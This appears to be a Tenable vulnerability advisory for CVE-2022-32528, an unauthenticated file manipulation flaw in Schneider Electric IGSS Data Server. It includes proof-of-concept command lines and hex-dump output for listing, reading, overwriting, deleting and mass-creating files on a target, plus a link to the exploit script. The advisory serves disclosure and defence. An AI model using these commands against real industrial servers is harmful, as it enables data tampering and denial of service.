Schneider Electric IGSS Data Server v15.0.0.22139 Project Report Directory File Manipulation
HighSynopsis
Tenable found a Project Report Directory File Manipulation vulnerability in Schneider Electric IGSS data server (IGSSdataServer.exe) v15.0.0.22052.
An unauthenticated remote attacker can manipulate files in the IGSS project report directory. The attacker can list, read, delete and write files in that directory. With the write file command, the attacker can change the content of an existing file and create a large number of new files to cause a denial-of-service condition (i.e., file system fill up).
List files:
python3 igss_dataserver_file_op.py -t <target> -p 12401 list Listing *.* in the IGSS project report directory... res: 00000000: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 00000010: 32 32 30 32 32 33 31 39 2E 4C 4F 47 00 00 00 00 22022319.LOG.... 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 00000060: 32 32 30 32 32 33 32 30 2E 4C 4F 47 00 00 00 00 22022320.LOG.... 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 000000B0: 32 32 30 32 32 33 32 31 2E 4C 4F 47 00 00 00 00 22022321.LOG.... 000000C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ <...snip...>
Read file:
python3 igss_dataserver_file_op.py -t <target> -p 12401 read -f 22022319.LOG Reading 22022319.LOG in the IGSS project report directory... res: 00000000: 00 00 00 00 00 10 00 00 00 00 00 00 05 00 00 00 ................ 00000010: EC 0F 00 00 17 00 AA AA C0 68 06 00 30 30 30 35 .........h..0005 00000020: 30 2D 30 30 2D 58 2D 50 2D 31 2D 30 30 30 30 00 0-00-X-P-1-0000. 00000030: 01 00 00 00 00 B8 74 8E E7 28 D8 01 20 75 D3 90 ......t..(.. u.. 00000040: 67 B7 D6 01 E0 07 00 00 11 00 00 00 00 00 00 00 g............... <...snip...>
Create a new file, list and read it:
python3 igss_dataserver_file_op.py -t <target> -p 12401 write -f test.txt Writing 128 random characters to test.txt in the IGSS project report directory... res: 00000000: 01 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 ....P........... 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ python3 igss_dataserver_file_op.py -t <target> -p 12401 list txt Listing *.txt in the IGSS project report directory... res: 00000000: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 00000010: 74 65 73 74 2E 74 78 74 00 00 00 00 00 00 00 00 test.txt........ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 01 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 ....P........... 00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ python3 igss_dataserver_file_op.py -t <target> -p 12401 read -f test.txt Reading test.txt in the IGSS project report directory... res: 00000000: 00 00 00 00 94 00 00 00 00 00 00 00 05 00 00 00 ................ 00000010: 80 00 00 00 39 50 4E 36 32 47 34 44 35 4F 39 4E ....9PN62G4D5O9N 00000020: 4E 32 4F 56 33 41 42 46 4A 55 53 49 56 58 31 38 N2OV3ABFJUSIVX18 00000030: 45 57 58 37 4E 4D 54 4D 56 50 38 4F 49 57 53 46 EWX7NMTMVP8OIWSF 00000040: 59 4C 41 31 4F 39 36 41 47 56 41 39 54 58 34 32 YLA1O96AGVA9TX42 00000050: 42 34 48 48 4F 50 48 30 37 47 55 50 41 39 4B 34 B4HHOPH07GUPA9K4 00000060: 52 53 42 48 44 55 36 44 34 4B 5A 4D 58 54 31 45 RSBHDU6D4KZMXT1E 00000070: 32 33 42 49 4B 53 5A 31 33 49 33 53 54 32 31 42 23BIKSZ13I3ST21B 00000080: 4E 31 44 4C 51 31 33 38 5A 30 36 4D 36 49 36 38 N1DLQ138Z06M6I68 00000090: 31 30 36 53 01 00 00 00 50 00 00 00 00 00 00 00 106S....P....... 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0: 00 00 00 00 ....
Change an existing file:
python3 igss_dataserver_file_op.py -t <target> -p 12401 write -f test.txt -s 256 Writing 256 random characters to test.txt in the IGSS project report directory... res: 00000000: 01 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 ....P........... 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ python3 igss_dataserver_file_op.py -t <target> -p 12401 read -f test.txt Reading test.txt in the IGSS project report directory... res: 00000000: 00 00 00 00 14 01 00 00 00 00 00 00 05 00 00 00 ................ 00000010: 00 01 00 00 44 44 59 32 37 54 45 43 31 59 55 51 ....DDY27TEC1YUQ 00000020: 42 56 32 30 34 30 4B 53 45 45 45 45 32 31 54 54 BV2040KSEEEE21TT 00000030: 33 36 48 46 4D 45 38 5A 4B 31 51 51 45 37 38 58 36HFME8ZK1QQE78X 00000040: 4C 32 30 46 45 45 4F 33 46 36 58 51 4E 37 50 37 L20FEEO3F6XQN7P7 00000050: 38 39 4A 50 4C 43 4A 43 48 57 53 30 4B 34 4C 4D 89JPLCJCHWS0K4LM 00000060: 55 4E 42 52 4A 54 50 56 37 59 37 45 57 50 54 49 UNBRJTPV7Y7EWPTI 00000070: 4B 50 33 4E 39 47 30 36 42 59 39 58 46 55 53 32 KP3N9G06BY9XFUS2 00000080: 38 44 4E 39 30 45 54 4A 38 36 45 54 46 58 45 5A 8DN90ETJ86ETFXEZ 00000090: 39 4A 47 4D 39 43 4D 35 53 5A 41 38 59 35 35 5A 9JGM9CM5SZA8Y55Z 000000A0: 53 38 55 43 4A 36 54 35 30 58 52 4C 34 32 43 34 S8UCJ6T50XRL42C4 000000B0: 4E 48 54 50 4F 45 32 54 44 51 46 37 48 52 37 53 NHTPOE2TDQF7HR7S 000000C0: 4D 49 5A 58 48 30 30 55 38 43 56 36 32 51 5A 5A MIZXH00U8CV62QZZ 000000D0: 42 49 49 39 36 4A 31 37 52 53 35 4F 44 44 53 58 BII96J17RS5ODDSX 000000E0: 43 37 50 34 42 47 47 54 52 4A 34 50 51 47 57 41 C7P4BGGTRJ4PQGWA 000000F0: 4B 57 30 42 32 56 41 57 42 5A 30 55 43 4F 33 48 KW0B2VAWBZ0UCO3H 00000100: 4E 4A 42 41 50 33 46 36 30 36 32 49 37 49 43 42 NJBAP3F6062I7ICB 00000110: 37 50 35 46 01 00 00 00 50 00 00 00 00 00 00 00 7P5F....P....... 00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000160: 00 00 00 00 ....
Delete an existing file:
python3 igss_dataserver_file_op.py -t <target> -p 12401 delete -f test.txt Deleting test.txt in the IGSS project report directory... res: 00000000: 01 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 ....P........... 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ python3 igss_dataserver_file_op.py -t <target> -p 12401 list txt Listing *.txt in the IGSS project report directory... res: 00000000: 01 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 ....P........... 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Create x number of files of y size:
python3 igss_dataserver_file_op.py -t <target> -p 12401 write -c 10 -s 200 Creating 10 random file(s) in the IGSS project report directory... Writing 200 random characters to UT44M7H9E2.XXX in the IGSS project report directory... Writing 200 random characters to K0LKRKJPRC.XXX in the IGSS project report directory... Writing 200 random characters to 100UMN9X74.XXX in the IGSS project report directory... Writing 200 random characters to 0G36NPJMQQ.XXX in the IGSS project report directory... Writing 200 random characters to QWO1W6GKTI.XXX in the IGSS project report directory... Writing 200 random characters to 6VZSN5RHHF.XXX in the IGSS project report directory... Writing 200 random characters to HCGQQPNN71.XXX in the IGSS project report directory... Writing 200 random characters to LF54X9U6JA.XXX in the IGSS project report directory... Writing 200 random characters to 5KEYWNKX9V.XXX in the IGSS project report directory... Writing 200 random characters to 5DVH68B2K0.XXX in the IGSS project report directory... python3 igss_dataserver_file_op.py -t <target> -p 12401 list xxx Listing *.xxx in the IGSS project report directory... res: 00000000: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 00000010: 30 47 33 36 4E 50 4A 4D 51 51 2E 58 58 58 00 00 0G36NPJMQQ.XXX.. 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 00000060: 31 30 30 55 4D 4E 39 58 37 34 2E 58 58 58 00 00 100UMN9X74.XXX.. 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 000000B0: 35 44 56 48 36 38 42 32 4B 30 2E 58 58 58 00 00 5DVH68B2K0.XXX.. 000000C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000F0: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 00000100: 35 4B 45 59 57 4E 4B 58 39 56 2E 58 58 58 00 00 5KEYWNKX9V.XXX.. 00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000140: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 00000150: 36 56 5A 53 4E 35 52 48 48 46 2E 58 58 58 00 00 6VZSN5RHHF.XXX.. 00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000190: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 000001A0: 48 43 47 51 51 50 4E 4E 37 31 2E 58 58 58 00 00 HCGQQPNN71.XXX.. 000001B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001E0: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 000001F0: 4B 30 4C 4B 52 4B 4A 50 52 43 2E 58 58 58 00 00 K0LKRKJPRC.XXX.. 00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000230: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 00000240: 4C 46 35 34 58 39 55 36 4A 41 2E 58 58 58 00 00 LF54X9U6JA.XXX.. 00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000280: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 00000290: 51 57 4F 31 57 36 47 4B 54 49 2E 58 58 58 00 00 QWO1W6GKTI.XXX.. 000002A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002D0: 00 00 00 00 50 00 00 00 00 00 00 00 01 00 00 00 ....P........... 000002E0: 55 54 34 34 4D 37 48 39 45 32 2E 58 58 58 00 00 UT44M7H9E2.XXX.. 000002F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000320: 01 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 ....P........... 00000330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Solution
Schneider Electric have released IGSS Data Server V15.0.0.22140 which includes a fix for this vulnerability.
Proof of Concept
https://github.com/tenable/poc/blob/master/SchneiderElectric/IGSS/igss_dataserver_file_op.py
Additional References
Disclosure Timeline
March 9, 2022 - Vulnerabilities discovered
April 11, 2022 - Vulnerabilities reported to vendor
April 11, 2022 - Vendor assigned case numbers 6392 and 6393
May 27, 2022 - Vendor stated they are finalizing the security notification for case 6393 and expecting disclosure for June
June 7, 2022 - Tenable acknowledged update on case 6393 and requested CVE and fixed version information
June 8, 2022 - Vendor responded that CVE would be assigned at time of disclosure for case 6393
June 14, 2022 - Vendor informed advisory was released for case 6393
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Risk Information
CVE ID:
CVE-2022-32528
Tenable Advisory ID:
TRA-2022-23
CVSSv3 Base / Temporal Score:
8.6 / 8.0
8.6 / 8.0
CVSSv3 Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
Affected Products:
Schneider Electric IGSS Data Server < 15.0.0.22140
Schneider Electric IGSS Data Server < 15.0.0.22140
Risk Factor:
High
High
Advisory Timeline
June 15, 2022 - Advisory published